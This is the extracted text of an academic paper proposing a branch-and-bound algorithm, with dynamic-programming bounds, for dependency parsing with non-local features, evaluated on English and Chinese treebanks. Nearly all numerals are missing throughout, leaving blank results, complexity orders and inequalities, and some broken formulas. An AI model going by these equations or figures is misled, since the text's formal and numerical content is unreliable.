posterior marginal beliefs for inference to satisfy the tree con- straint: for each factor, only legal messages (satisfy- ing global constraints) are considered in the partition function. a similar line of research investigated the use of integer linear programming (ilp) based parsing (riedel and clarke, ; martins et al., ). this method is very expressive. it can handle arbitrary non-local features determined or bounded by linear inequalities of local features. for local models, lp is less efficient than dp. the reason is that, dp works on a small number of dimensions in each recursion, while for lp, the popular revised simplex method needs to solve a m dimensional linear system in each iteration (nocedal and wright, ), where m is the number of constraints, which is quadratic in sentence length for projective dependency pars- ing (martins et al., ). dual decomposition (dd) (rush et al., ; koo et al., ) is a special case of lagrangian re- laxation. it relies on standard decoding algorithms as oracle solvers for sub-problems, together with a simple method for forcing agreement between the different oracles. this method does not need to con- sider the tree constraint explicitly, as it resorts to dy- namic programming which guarantees its satisfac- tion. it works well if the sub-problems can be well defined, especially for joint learning tasks. howev- er, for the task of dependency parsing, using various non-local features may result in many overlapped sub-problems, hence it may take a long time to reach a consensus (martins et al., ). in this paper, we propose a novel branch and bound (b&b) algorithm for efficient parsing with various non-local features. b&b (land and doig, ) is generally used for combinatorial optimiza- tion problems such as ilp. 
the difference between our method and ilp is that the sub-problem in ilp is a relaxed lp, which requires a numerical solution, while ours bounds the non-local features by a lin- ear combination of local features and uses dp for decoding as well as calculating the upper bound of the objective function. an exact solution is achieved if the bound is tight. though in the worst case, time complexity is exponential in sentence length, it is practically efficient especially when adopting a pruning strategy. experiments are conducted on english penntree bank and chinese tree bank (ctb ) with stan- dard train/develop/test split. we achieved . % unlabeled attachment score (uas) for english at a speed of words per second and . % for chi- nese at a speed of words per second. graph based parsing . problem definition given a sentence x = x ,x , . . . ,xn where xi is the ith word of the sentence, dependency parsing as- signs exactly one head word to each word, so that dependencies from head words to modifiers form a tree. the root of the tree is a special symbol de- noted by x which has exactly one modifier. in this paper, we focus on unlabeled projective dependency parsing but our algorithm can be adapted for labeled or non-projective dependency parsing (mcdonald et al., b). the inference problem is to search the optimal parse tree y∗ y∗ = arg maxy∈y(x)ϕ(x,y) where y(x) is the set of all candidate parse trees of sentence x. ϕ(x,y) is a given score function which is usually decomposed into small parts ϕ(x,y) = ∑ c⊆y ϕc(x) ( ) where c is a subset of edges, and is called a factor. for example, in the all grandchild model (koo and collins, ), the score function can be represented as ϕ(x,y) = ∑ ehm∈y ϕehm (x) + ∑ egh,ehm∈y ϕegh,ehm (x) where the first term is the sum of scores of all edges xh → xm, and the second term is the sum of the scores of all edge chains xg → xh → xm. in discriminative models, the score of a parse tree y is the weighted sum of the fired feature functions, which can be represented by the sum of the factors ϕ(x,y) = wt f (x,y) = ∑ c⊆y wt f (x,c) = ∑ c⊆y ϕc(x) where f (x,c) is the feature vector that depends on c. for example, we could define a feature for grand- child c = {egh,ehm} f(x,c) =    if xg = would ∧ xh = be ∧xm = happy ∧ c is selected otherwise . dynamic programming for local models in first order models, all factors c in eq( ) contain a single edge. the optimal parse tree can be derived by dp with running time o(n ) (eisner, ). the algorithm has two types of structures: complete s- pan, which consists of a headword and its descen- dants on one side, and incomplete span, which con- sists of a dependency and the region between the head and modifier. it starts at single word spans, and merges the spans in bottom up order. for second order models, the score function ϕ(x,y) adds the scores of siblings (adjacent edges with a common head) and grandchildren ϕ(x,y) = ∑ ehm∈y ϕehm (x) + ∑ egh,ehm∈y ϕehm,egh (x) + ∑ ehm,ehs∈y ϕehm,ehs (x) there are two versions of second order models, used respectively by carreras ( ) and koo et al. ( ). the difference is that carreras’ only con- siders the outermost grandchildren, while koo and collin’s allows all grandchild features. both models permit o(n ) running time. third-order models score edge triples such as three adjacent sibling modifiers, or grand-siblings that score a word, its modifier and its adjacent grand- children, and the inference complexity is o(n ) (koo and collins, ). 
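As a concrete reference point for the first-order case just described, the sketch below is a standard implementation of Eisner's cubic-time dynamic program over complete and incomplete spans with arc-factored scores. It returns only the best tree score (back-pointers for recovering the tree are omitted), the arc-score matrix convention is an assumption of this sketch, and the single-modifier constraint on the root is not enforced.

```python
import numpy as np

def eisner_first_order(arc_score):
    """Best projective tree score under an arc-factored model.

    arc_score[h][m] is the score of the dependency h -> m; token 0 is the
    artificial root. Only the optimal score is returned, to keep the sketch short.
    """
    n = arc_score.shape[0]
    NEG = float("-inf")
    # complete[s, t, d] / incomplete[s, t, d]: best span (s, t) headed at its
    # left end (d = 1) or its right end (d = 0).
    complete = np.full((n, n, 2), NEG)
    incomplete = np.full((n, n, 2), NEG)
    for i in range(n):
        complete[i, i, 0] = complete[i, i, 1] = 0.0

    for length in range(1, n):
        for s in range(n - length):
            t = s + length
            # Incomplete spans: create the arc s -> t (d = 1) or t -> s (d = 0).
            best = max(complete[s, r, 1] + complete[r + 1, t, 0] for r in range(s, t))
            incomplete[s, t, 1] = best + arc_score[s, t]
            incomplete[s, t, 0] = best + arc_score[t, s] if s > 0 else NEG
            # Complete spans: extend an incomplete span with a complete one.
            complete[s, t, 1] = max(incomplete[s, r, 1] + complete[r, t, 1]
                                    for r in range(s + 1, t + 1))
            complete[s, t, 0] = max(complete[s, r, 0] + incomplete[r, t, 0]
                                    for r in range(s, t))
    return complete[0, n - 1, 1]

scores = np.random.RandomState(0).randn(5, 5)   # root + 4 words, random arc scores
print(eisner_first_order(scores))
```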
in this paper, for all the factors/features that can be handled by dp, we call them the local fac- tors/features. the proposed method . basic idea for general high order models with non-local fea- tures, we propose to use branch and bound (b&b) algorithm to search the optimal parse tree. a b&b algorithm has two steps: branching and bounding. the branching step recursively splits the search s- pace y(x) into two disjoint subspaces y(x) = y ∪ y by fixing assignment of one edge. for each subspace yi, the bounding step calculates the upper bound of the optimal parse tree score in the sub- space: ubyi ≥ maxy∈yi ϕ(x,y). if this bound is no more than any obtained parse tree score ubyi ≤ ϕ(x,y′), then all parse trees in subspace yi are no more optimal than y′, and yi could be pruned safely. the efficiency of b&b depends on the branching strategy and upper bound computation. for exam- ple, sun et al. ( ) used b&b for mrfs, where they proposed two branching strategies and a novel data structure for efficient upper bound computation. klenner and ailloud ( ) proposed a variation of balas algorithm (balas, ) for coreference reso- lution, where candidate branching variables are sort- ed by their weights. our bounding strategy is to find an upper bound for the score of each non-local factor c containing multiple edges. the bound is the sum of new scores of edges in the factor plus a constant ϕc(x) ≤ ∑ e∈c ψe(x) + αc based on the new scores {ψe(x)} and constants {αc}, we define the new score of parse tree y ψ(x,y) = ∑ c⊆y ( ∑ e∈c ψe(x) + αc ) then we have ψ(x,y) ≥ ϕ(x,y), ∀y ∈ y(x) the advantage of such a bound is that, it is the sum of new edge scores. hence, its optimum tree maxy∈y(x) ψ(x,y) can be found by dp, which is the upper bound of maxy∈y(x) ϕ(x,y), as for any y ∈ y(x), ψ(x,y) ≥ ϕ(x,y). . the upper bound function in this section, we derive the upper bound function ψ(x,y) described above. to simplify notation, we drop x throughout the rest of the paper. let zc be a binary variable indicating whether factor c is se- lected in the parse tree. we reformulate the score function in eq( ) as ϕ(y) ≡ ϕ(z) = ∑ c ϕczc ( ) correspondingly, the tree constraint is replaced by z ∈ z. then the parsing task is z∗ = arg maxz∈zϕczc ( ) notice that, for any zc, we have zc = min e∈c ze which means that factor c appears in parse tree if and only if all its edges {e|e ∈ c} are selected in the tree. here ze is short for z{e} for simplicity. our bounding method is based on the following fact: for a set {a ,a , . . .ar} (aj denotes the jth el- ement) , its minimum min{aj} = min p∈∆ ∑ j pjaj ( ) where ∆ is probability simplex ∆ = {p|pj ≥ , ∑ j pj = } we discuss the bound for ϕczc in two cases: ϕc ≥ and ϕc < . if ϕc ≥ , we have ϕczc = ϕc min e∈c ze = ϕc min pc∈∆ ∑ e∈c pecze = min pc∈∆ ∑ e∈c ϕcp e cze the second equation comes from eq( ). for sim- plicity, let gc(pc,z) = ∑ e∈c ϕcp e cze with domain domgc = {pc ∈ ∆; ze ∈ { , }, ∀e ∈ c}. then we have ϕczc = min pc gc(pc,z) ( ) if ϕc < , we have two upper bounds. one is commonly used in ilp when all the variables are bi- nary a∗ = min j {aj}rj= ⇔ a∗ ≤ aj a∗ ≥ ∑ j aj − (r − ) according to the last inequality, we have the upper bound for negative scored factors ϕczc ≤ ϕc ( ∑ e∈c ze − (rc − ) ) ( ) where rc is the number of edges in c. for simplicity, we use the notation σc(z) = ϕc ( ∑ e∈c ze − (rc − ) ) the other upper bound when ϕc < is simple ϕczc ≤ ( ) notice that, for any parse tree, one of the upper bounds must be tight. 
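Looking ahead to how these per-factor bounds are combined: once the distributions p_c are fixed, each bound is linear in the edge indicators, so every factor weight can be folded into per-edge scores plus a constant and handed to a first-order DP such as the Eisner sketch above. The sketch below assumes a simple list-of-edges factor representation; for a negative factor it uses a two-point distribution over {σ_c(z), 0}, anticipating the form the text assembles next. All names and data layouts are illustrative.

```python
# Sketch of the bounding step: fold factor weights into per-edge scores plus a
# constant, so that maximising the upper bound reduces to first-order parsing.

def fold_factors_into_edges(edge_scores, factors, p):
    """Return (new_edge_scores, constant) defining the upper bound for fixed p.

    edge_scores : dict {(h, m): local score}
    factors     : list of (edges, weight), edges a list of (h, m) pairs
    p           : one distribution per factor; for weight >= 0 a distribution
                  over the factor's edges, for weight < 0 a pair (q, 1 - q)
                  over {σ_c(z), 0}.
    """
    psi = dict(edge_scores)
    constant = 0.0
    for (edges, w), p_c in zip(factors, p):
        if w >= 0:
            for e, prob in zip(edges, p_c):        # φ_c z_c <= Σ_e φ_c p_c^e z_e
                psi[e] = psi.get(e, 0.0) + w * prob
        else:
            q = p_c[0]                             # weight placed on the σ_c(z) bound
            for e in edges:                        # q·φ_c·Σ_e z_e part of σ_c(z)
                psi[e] = psi.get(e, 0.0) + q * w
            constant += -q * w * (len(edges) - 1)  # q·φ_c·(−(r_c − 1))
    return psi, constant

edge_scores = {(0, 1): 1.0, (1, 2): 0.5, (2, 3): 0.2, (1, 3): 0.1}
factors = [([(1, 2), (2, 3)], 2.0),    # e.g. a grandchild chain 1 -> 2 -> 3
           ([(1, 2), (1, 3)], -1.5)]   # e.g. a disfavoured sibling pair
p = [[0.5, 0.5], (1.0, 0.0)]
print(fold_factors_into_edges(edge_scores, factors, p))
```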
eq( ) is tight if c appears in the parse tree: zc = , otherwise eq( ) is tight. therefore ϕczc = min {σc(z), } let hc(pc,z) = p cσc(z) + p c · with domhc = {pc ∈ ∆; ze ∈ { , }, ∀e ∈ c}. according to eq( ), we have ϕczc = min pc hc(pc,z) ( ) let ψ(p,z) = ∑ c,ϕc≥ gc(pc,z) + ∑ c,ϕc< hc(pc,z) minimize ψ with respect to p, we have min p ψ(p,z) = min p   ∑ c,ϕc≥ gc(pc,z) + ∑ c,ϕc< hc(pc,z)   = ∑ c,ϕc≥ min pc gc(pc,z) + ∑ c,ϕc< min pc hc(pc,z) = ∑ c,ϕc≥ ϕczc + ∑ c,ϕc< ϕczc = ϕ(z) the second equation holds since, for any two fac- tors, c and c′, gc (or hc) and gc′ (or hc′ ) are separable. the third equation comes from eq( ) and eq( ). based on this, we have the following proposition: proposition . for any p,pc ∈ ∆, and z ∈ z, ψ(p,z) ≥ ϕ(z). therefore, ψ(p,z) is an upper bound function of ϕ(z). furthermore, fixing p, ψ(p,z) is a linear func- tion of ze , see eq( ) and eq( ), variables zc for large factors are eliminated. hence z′ = arg maxzψ(p,z) can be solved efficiently by dp. because ψ(p,z′) ≥ ψ(p,z∗) ≥ ϕ(z∗) ≥ ϕ(z′) after obtaining z′ , we get the upper bound and lower bound of ϕ(z∗): ψ(p,z′) and ϕ(z′). the upper bound is expected to be as tight as pos- sible. using min-max inequality, we get max z∈z ϕ(z) = max z∈z min p ψ(p,z) ≤ min p max z∈z ψ(p,z) which provides the tightest upper bound of ϕ(z∗). since ψ is not differentiable w.r.t p, projected sub-gradient (calamai and moré, ; rush et al., ) is used to search the saddle point. more specifically, in each iteration, we first fix p and search z using dp, then we fix z and update p by pnew = p∆ ( p + ∂ψ ∂p α ) where α > is the step size in line search, function p∆(q) denotes the projection of q onto the proba- bility simplex ∆. in this paper, we use euclidean projection, that is p∆(q) = min p∈∆ ∥p − q∥ which can be solved efficiently by sorting (duchi et al., ). . branch and bound based parsing as discussed in section . , the b&b recursive pro- cedure yields a binary tree structure called branch and bound tree. each node of the b&b tree has some fixed ze, specifying some must-select edges and must-remove edges. the root of the b&b tree has no constraints, so it can produce all possible parse trees including z∗. each node has two chil- dren. one adds a constraint ze = for a free edge z =e z =e ψ φ = = ψ<lb ψ φ = = ψ φ = = ψ φ = = ψ φ = = ψ φ = = ψ φ = = min p max z∈z ze = ze = ψ(p,z) figure : a part of b&b tree. ϕ,ψ are short for ϕ(z′) and ψ(p′,z′) respectively. for each node, some edges of the parse tree are fixed. all parse trees that satisfy the fixed edges compose the subset of s ⊆ z. a min-max problem is solved to get the upper bound and lower bound of the optimal parse tree over s. once the upper bound ψ is less than lb, the node is removed safely. e and the other fixes ze = . we can explore the search space {z|ze ∈ { , }} by traversing the b&b tree in breadth first order. let s ⊆ z be subspace of parse trees satisfying the constraint, i.e., in the branch of the node. for each node in b&b tree, we solve p′,z′ = arg min p max z∈s ψ(p,z) to get the upper bound and lower bound of the best parse tree in s. a global lower bound lb is main- tained which is the maximum of all obtained lower bounds. if the upper bound of the current node is lower than the global lower bound, the node can be pruned from the b&b tree safely. an example is shown in figure . when the upper bound is not tight: ψ > lb, we need to choose a good branching variable to gener- ate the child nodes. 
let g(z′) = ψ(p′,z′) − ϕ(z′) denote the gap between the upper bound and lower bound. this gap is actually the accumulated gaps of all factors c. let gc be the gap of c gc = { gc(p ′ c,z ′) − ϕcz′c if ϕc ≥ hc(p ′ c,z ′) − ϕcz′c if ϕc < we choose the branching variable heuristically: for each edge e, we define its gap as the sum of the gaps of factors that contain it ge = ∑ c,e∈c gc the edge with the maximum gap is selected as the branching variable. suppose there are n nodes on a level of b&b tree, and correspondingly, we get n branching vari- ables, among which, we choose the one with the highest lower bound as it likely reaches the optimal value faster. . lower bound initialization a large lower bound is critical for efficient pruning. in this section, we discuss an alternative way to ini- tialize the lower bound lb. we apply the similar trick to get the lower bound function of ϕ(z). similar to eq( ), for ϕc ≥ , we have ϕczc = max{ϕc ( ∑ e∈c ze − (rc − ) ) , } = max{σc(z), } using the fact that max{aj} = max p∈∆ ∑ j pjaj we have ϕczc = max pc∈∆ p cσc(z) + p c · = max pc hc(pc,z) for ϕc < , we have ϕczc = max e∈c {ϕcze} = max pc∈∆ ∑ e∈c pecϕcze = max pc gc(pc,z) put the two cases together, we get the lower bound function π(p,z) = ∑ c,ϕc≥ hc(pc,z) + ∑ c,ϕc< gc(pc,z) algorithm branch and bound based parsing require: {ϕc} ensure: optimal parse tree z∗ solve p∗,z∗ = arg maxp,zπ(p,z) initialize s = {z}, lb = π(p∗,z∗) while s ̸= ∅ do set s′ = ∅{nodes that survive from pruning} foreach s ∈ s solve minp maxz ψ(p,z) to get lbs,ubs lb = max{lb,lbs∈s }, update z∗ foreach s ∈ s, add s to s′, if ubs > lb select a branching variable ze. clear s = ∅ foreach s ∈ s′ add s = {z|z ∈ s,ze = } to s add s = {z|z ∈ s,ze = } to s. end while for any p,pc ∈ ∆,z ∈ z π(p,z) ≤ ϕ(z) π(p,z) is not concave, however, we could alterna- tively optimize z and p to get a good approximation, which provides a lower bound for ϕ(z∗). . summary we summarize our b&b algorithm in algorithm . it is worth pointing out that so far in the above description, we have used the assumption that the backbone dp uses first order models, however, the backbone dp can be the second or third order ver- sion. the difference is that, for higher order dp, higher order factors such as adjacent siblings, grand- children are directly handled as local factors. in the worst case, all the edges are selected for branching, and the complexity grows exponentially in sentence length. however, in practice, it is quite efficient, as we will show in the next section. experiments . experimental settings the datasets we used are the english penn tree bank (ptb) and chinese tree bank . (ctb ). we use the standard train/develop/test split as described in table . we extracted dependencies using joakim nivre’s penn malt tool with standard head rules: yamada and matsumoto’s (yamada and matsumoto, ) train develop test ptb sec. - sec. sec. ctb sec. - sec. - sec. - - - - table : data split in our experiment for english, and zhang and clark’s (zhang and clark, ) for chinese. unlabeled attachment s- core (uas) is used to evaluate parsing quality . the b&b parser is implemented with c++. all the ex- periments are conducted on the platform intel core i - cpu . ghz. . baseline: dp based second order parser we use the dynamic programming based second or- der parser (carreras, ) as the baseline. aver- aged structured perceptron (collins, ) is used for parameter estimation. we determine the number of iterations on the validation set, which is for both corpora. 
for english, we train the pos tagger using linear chain perceptron on training set, and predict pos tags for the development and test data. the parser is trained using the automatic pos tags generated by fold cross validation. for chinese, we use the gold standard pos tags. we use five types of features: unigram features, bigram features, in-between features, adjacent sib- ling features and outermost grand-child features. the first three types of features are firstly introduced by mcdonald et al. ( a) and the last two type- s of features are used by carreras ( ). all the features are the concatenation of surrounding words, lower cased words (english only), word length (chi- nese only), prefixes and suffixes of words (chinese only), pos tags, coarse pos tags which are derived from pos tags using a simple mapping table, dis- tance between head and modifier, direction of edges. for english, we used feature templates to gener- ate large amounts of features, and finally got . m non-zero weighted features after training. the base- line parser got . % uas on the testing set. for chinese, we used feature templates, and finally got . m non-zero weighted features after train- for english, we follow koo and collins ( ) and ignore any word whose gold-standard pos tag is one of { “ ” : , .}. for chinese, we ignore any word whose pos tag is pu. ing. the baseline parser got . % uas on the testing set. . b&b based parser with non-local features we use the baseline parser as the backbone of our b&b parser. we tried different types of non-local features as listed below: • all grand-child features. notice that this fea- ture can be handled by koo’s second order model (koo and collins, ) directly. • all great grand-child features. • all sibling features: all the pairs of edges with common head. an example is shown in fig- ure . • all tri-sibling features: all the -tuples of edges with common head. • comb features: for any word with more than consecutive modifiers, the set of all the edges from the word to the modifiers form a comb. • hand crafted features: we perform cross val- idation on the training data using the baseline parser, and designed features that may correc- t the most common errors. we designed hand-craft features for english in total. one ex- ample is shown in figure . for chinese, we did not add any hand-craft features, as the er- rors in the cross validation result vary a lot, and we did not find general patterns to fix them. . implementation details to speed up the solution of the min-max subprob- lem, for each node in the b&b tree, we initialize p with the optimal solution of its parent node, since the child node fixes only one additional edge, its op- timal point is likely to be closed to its parent’s. for the root node of b&b tree, we initialize pec = rc for factors with non-negative weights and p c = for in fact, our algorithm can deal with non-consecutive mod- ifiers; however, in such cases, factor detection (detect regular expressions like x . ∗ x . ∗ . . . ) requires the longest com- mon subsequence algorithm (lcs), which is time-consuming if many comb features are generated. similar problems arise for sub-tree features, which may contain many non-consecutive words. c c c c c h c c c h c c c h c c c h c c h c c h c c h second order higher order figure : an example of all sibling features. top: a sub-tree; bottom: extracted sibling features. ex- isting higher order dp systems can not handle the siblings on both sides of head. regulation occurs through inaction , rather than through ... 
figure : an example of hand-craft feature: for the word sequence a . . . rather than a, where a is a preposition, the first a is the head of than, than is the head of rather and the second a. negative weighted factors. step size α is initialized with maxc,ϕc ̸= { |ϕc| }, as the vector p is bounded in a unit box. α is updated using the same strategy as rush et al. ( ). two stopping criteria are used. one is ≤ ψold − ψnew ≤ ϵ, where ϵ > is a given precision . the other checks if the bound is tight: ub = lb. because all features are boolean (note that they can be integer), their weights are integer during each perceptron update, hence the scores of parse trees are discrete. the minimal gap between different scores is n×t after averaging, where n is the number of training samples, and t is the itera- tion number for perceptron training. therefore the upper bound can be tightened as ub = ⌊ntψ⌋ nt . during testing, we use the pre-pruning method as used in martins et al. ( ) for both datasets to bal- ance parsing quality and speed. this method uses a simple classifier to select the top k candidate head- s for each word and exclude the other heads from search space. in our experiment, we set k = . we use ϵ = − in our implementation system ptb ctb our baseline . . b&b +all grand-child . . +all great grand-child . . +all sibling . . +all tri-sibling . . +comb . . +hand craft . n/a +all grand-child + all sibling + com- b + hand craft . . rd order re-impl. . . turboparser (reported) . n/a turboparser (our run) . . koo and collins ( ) . n/a zhang and mcdonald ( ) . . zhang and nivre ( ) . . system integration bohnet and kuhn ( ) . . systems using additional resources suzuki et al. ( ) . n/a koo et al. ( ) . n/a chen et al. ( ) . n/a table : comparison between our system and the- state-of-art systems. . main result experimental results are listed in table . for com- parison, we also include results of representative state-of-the-art systems. for the third order pars- er, we re-implemented model (koo and collins, ), and removed the longest sentence in the ctb dataset, which contains words, due to the o(n ) space complexity . for ilp based parsing, we used turboparser , a speed-optimized parser toolkit. we trained full models (which use all grandchild fea- tures, all sibling features and head bigram features (martins et al., )) for both datasets using its de- fault settings. we also list the performance in its documentation on english corpus. the observation is that, the all-sibling features are most helpful for our parser, as some good sibling features can not be encoded in dp based parser. for example, a matched pair of parentheses are always siblings, but their head may lie between them. an- in fact, koo’s algorithm requires only o(n ) space. our implementation is o(n ) because we store the feature vectors for fast training. http://www.ark.cs.cmu.edu/turboparser/ other observation is that all great grandchild features and all tri-sibling features slightly hurt the perfor- mance and we excluded them from the final system. when no additional resource is available, our parser achieved competitive performance: . % unlabeled attachment score (uas) for english at a speed of words per second and . % for chinese at a speed of words per second. high- er uas is reported by joint tagging and parsing (bohnet and nivre, ) or system integration (bohnet and kuhn, ) which benefits from both transition based parsing and graph based parsing. 
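As a small illustration of the all-sibling factors discussed above, the sketch below enumerates every pair of edges sharing a head, including pairs whose modifiers fall on opposite sides of the head, which is the case a second-order DP parser cannot score directly; the toy tree and the head-array encoding are assumptions made for the example.

```python
from itertools import combinations

def all_sibling_factors(heads):
    """Enumerate all-sibling factors: every unordered pair of edges that share a
    head, no matter which side of the head the two modifiers fall on.
    heads[m - 1] = h means word m (1-indexed) is a modifier of word h (0 = root)."""
    modifiers = {}
    for m, h in enumerate(heads, start=1):
        modifiers.setdefault(h, []).append(m)
    factors = []
    for h, mods in modifiers.items():
        for m1, m2 in combinations(sorted(mods), 2):
            factors.append((h, m1, m2))           # one sibling factor per modifier pair
    return factors

# Toy tree over four words: word 2 attaches to the root, the rest attach to word 2
print(all_sibling_factors([2, 0, 2, 2]))
# [(2, 1, 3), (2, 1, 4), (2, 3, 4)]  word 1 is left of its head while words 3 and 4
# are right of it, so some of these sibling pairs straddle the head.
```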
Previous work shows that a combination of the two parsing techniques can learn to overcome the shortcomings of each non-integrated system (Nivre and McDonald, ; Zhang and Clark, ). System combination will be an interesting topic for our future research. The highest reported performance on the English corpus is . %, obtained by semi-supervised learning with a large amount of unlabeled data (Suzuki et al., ).

Tradeoff between accuracy and speed

In this section we study the trade-off between accuracy and speed under different pre-pruning setups. The table below reports parsing accuracy and inference time at test time for different numbers of candidate heads k kept in the pruning step. On the English dataset, when k is not too small, our parser obtains a considerable speedup over the unpruned setting without losing much parsing accuracy; the speed increases further with smaller k, at the cost of some accuracy. Compared with TurboParser, our parser is less efficient but more accurate. Zhang and McDonald ( ) is a state-of-the-art system that adopts cube pruning for efficient parsing; notice that they did not use pruning, which appears able to increase parsing speed with little loss in accuracy. Moreover, they perform labeled parsing, which also makes their speed not directly comparable.

For each node of the B&B tree, our parsing algorithm uses the projected sub-gradient method to find the saddle point, which requires a number of calls to a DP; hence the efficiency of the algorithm is mainly determined by the number of DP calls. The two figures below show the averaged parsing time and the averaged number of DP calls relative to sentence length under different pruning settings. Parsing time grows smoothly for short and medium sentences, with some fluctuation for the long sentences; this is because there are very few sentences of any specific long length (usually only a handful), and the statistics are not stable or meaningful for such small samples. Without pruning, the average number of DP calls per sentence remains small on both the English and the Chinese test sets.

Table: trade-off between parsing accuracy (UAS) and parsing speed (words per second) on PTB and CTB under different pre-pruning settings, where k denotes the number of candidate heads of each word preserved for B&B parsing. The rows compare ours (no prune), ours at four pruning levels of k, TurboParser (full), TurboParser (standard), TurboParser (basic), and Zhang and McDonald ( ); the speed of the latter is not directly comparable, as they perform labeled parsing without pruning.

Figure: averaged parsing time (seconds) relative to sentence length under different pruning settings on (a) the PTB corpus and (b) the CTB corpus; k denotes the number of candidate heads of each word kept in the pruning step.

Figure: averaged number of calls to DP relative to sentence length under different pruning settings on (a) the PTB corpus and (b) the CTB corpus; k denotes the number of candidate heads of each word kept in the pruning step.

Discussion

Polynomial non-local factors

Our bounding strategy can handle a family of non-local factors that can be expressed as a polynomial function of local factors. To see this, suppose $z_c = \sum_i \alpha_i \prod_{e \in E_i} z_e$. For each $i$ we introduce a new variable $z_{E_i} = \min_{e \in E_i} z_e$; because $z_e$ is binary, $z_{E_i} = \prod_{e \in E_i} z_e$. In this way we replace $z_c$ by several variables $z_{E_i}$ that can be handled by our bounding strategy. We give two examples of such polynomial non-local factors. The first is the OR of local factors, $z_c = \max\{z_e, z_{e'}\}$, which can be expressed as $z_c = z_e + z_{e'} - z_e z_{e'}$. The second is the valency factor (Martins et al., ). Let the binary variable $v_{ik}$ indicate whether word $i$ has exactly $k$ modifiers. Given $\{z_e\}$ for the edges with head $i$, the indicators $\{v_{ik}\}$ can be solved from

$$\sum_k k^j \, v_{ik} = \Big(\sum_e z_e\Big)^{j}, \qquad 0 \le j \le n-1.$$

The left-hand side is a linear function of the $v_{ik}$ and the right-hand side is a polynomial function of the $z_e$; hence each $v_{ik}$ can be expressed as a polynomial function of the $z_e$.

K-best parsing

Though our B&B algorithm is able to capture a variety of non-local features, it is still difficult to handle many kinds of features, such as the depth of the parse tree. Hence a reranking approach may be useful for incorporating such information: k parse trees are generated first, and a second-pass model then reranks these candidates based on more global or non-local features. In addition, k-best parsing may be needed in many applications in order to use parse information and, especially, to exploit information from multiple candidates to optimize task-specific performance. We have not conducted any experiment on k-best parsing, so we only discuss the algorithm. Based on the earlier proposition, we have the following.

Proposition. Given $p$ and a subset $S \subseteq Z$, let $z^k$ denote the $k$-th best solution of $\max_{z \in S} \psi(p, z)$. If a parse tree $z' \in S$ satisfies $\phi(z') \ge \psi(p, z^k)$, then $z'$ is one of the $k$ best parse trees in the subset $S$.

Proof. Since $z^k$ is the $k$-th best solution of $\psi(p, z)$, for every $z^j$ with $j > k$ we have $\psi(p, z^k) \ge \psi(p, z^j) \ge \phi(z^j)$. The set $\{z^j \mid j > k\}$ has size $|S| - k$, so there are at least $|S| - k$ parse trees whose scores $\phi(z^j)$ do not exceed $\psi(p, z^k)$. Because $\phi(z') \ge \psi(p, z^k)$, $z'$ is at least the $k$-th best parse tree in the subset $S$.

Therefore we can search for the k best parse trees as follows: for each sub-problem, we use DP to derive the k best parse trees, and every parse tree $z$ with $\phi(z) \ge \psi(p, z^k)$ is selected into the k-best set. The algorithm terminates once the $k$-th bound is tight.

Conclusion

In this paper we proposed a new parsing algorithm based on a branch-and-bound framework. The motivation is to use dynamic programming to search for the bound. Experimental results on the PTB and CTB datasets show that our method is competitive in terms of both performance and efficiency. Our method can be adapted to non-projective dependency parsing, using the k-best MST algorithm (Hall, ) to find the k best candidates.

Acknowledgments

We would like to thank Hao Zhang, Andre Martins and Zhenghua Li for their helpful discussions. We also thank Ryan McDonald and three anonymous reviewers for their valuable comments. This work is partly supported by DARPA under contracts no. HR - -C- and FA - - - . Any opinions expressed in this material are those of the authors and do not necessarily reflect the views of DARPA.

References

Michael Auli and Adam Lopez. . A comparison of loopy belief propagation and dual decomposition for integrated CCG supertagging and parsing. In Proc. of ACL-HLT.
Egon Balas. . An additive algorithm for solving linear programs with zero-one variables.
operations research, ( ). bernd bohnet and jonas kuhn. . the best of bothworlds – a graph-based completion model for transition-based parsers. in proc. of eacl. bernd bohnet and joakim nivre. . a transition- based system for joint part-of-speech tagging and la- beled non-projective dependency parsing. in proc. of emnlp-conll. paul calamai and jorge moré. . projected gradien- t methods for linearly constrained problems. mathe- matical programming, ( ). xavier carreras. . experiments with a higher-order projective dependency parser. in proc. of emnlp- conll. eugene charniak and mark johnson. . coarse-to- fine n-best parsing and maxent discriminative rerank- ing. in proc. of acl. wenliang chen, min zhang, and haizhou li. . u- tilizing dependency language models for graph-based dependency parsing models. in proc. of acl. michael collins. . discriminative reranking for nat- ural language parsing. in proc. of icml. michael collins. . discriminative training methods for hidden markov models: theory and experiments with perceptron algorithms. in proc. of emnlp. john duchi, shai shalev-shwartz, yoram singer, and tushar chandra. . efficient projections onto the l -ball for learning in high dimensions. in proc. of icml. jason m. eisner. . three new probabilistic models for dependency parsing: an exploration. in proc. of coling. keith hall. . k-best spanning tree parsing. in proc. of acl. liang huang and david chiang. . better k-best parsing. in proc. of iwpt. liang huang. . forest reranking: discriminative parsing with non-local features. in proc. of acl-hlt. manfred klenner and étienne ailloud. . opti- mization in coreference resolution is not needed: a nearly-optimal algorithm with intensional constraints. in proc. of eacl. terry koo and michael collins. . efficient third- order dependency parsers. in proc. of acl. terry koo, xavier carreras, and michael collins. . simple semi-supervised dependency parsing. in proc. of acl-hlt. terry koo, alexander m. rush, michael collins, tommi jaakkola, and david sontag. . dual decomposi- tion for parsing with non-projective head automata. in proc. of emnlp. ailsa h. land and alison g. doig. . an automat- ic method of solving discrete programming problems. econometrica, ( ): – . andre martins, noah smith, and eric xing. . con- cise integer linear programming formulations for de- pendency parsing. in proc. of acl. andre martins, noah smith, mario figueiredo, and pe- dro aguiar. . dual decomposition with many overlapping components. in proc. of emnlp. ryan mcdonald, koby crammer, and fernando pereira. a. online large-margin training of dependency parsers. in proc. of acl. ryan mcdonald, fernando pereira, kiril ribarov, and jan hajic. b. non-projective dependency pars- ing using spanning tree algorithms. in proc. of hlt- emnlp. joakim nivre and ryan mcdonald. . integrating graph-based and transition-based dependency parsers. in proc. of acl-hlt. jorge nocedal and stephen j. wright. . numerical optimization. springer, nd edition. sebastian riedel and james clarke. . incremental integer linear programming for non-projective depen- dency parsing. in proc. of emnlp. alexander m rush, david sontag, michael collins, and tommi jaakkola. . on dual decomposition and linear programming relaxations for natural language processing. in proc. of emnlp. david smith and jason eisner. . dependency pars- ing by belief propagation. in proc. of emnlp. min sun, murali telaprolu, honglak lee, and silvio savarese. . efficient and exact map-mrf in- ference using branch and bound. in proc. 
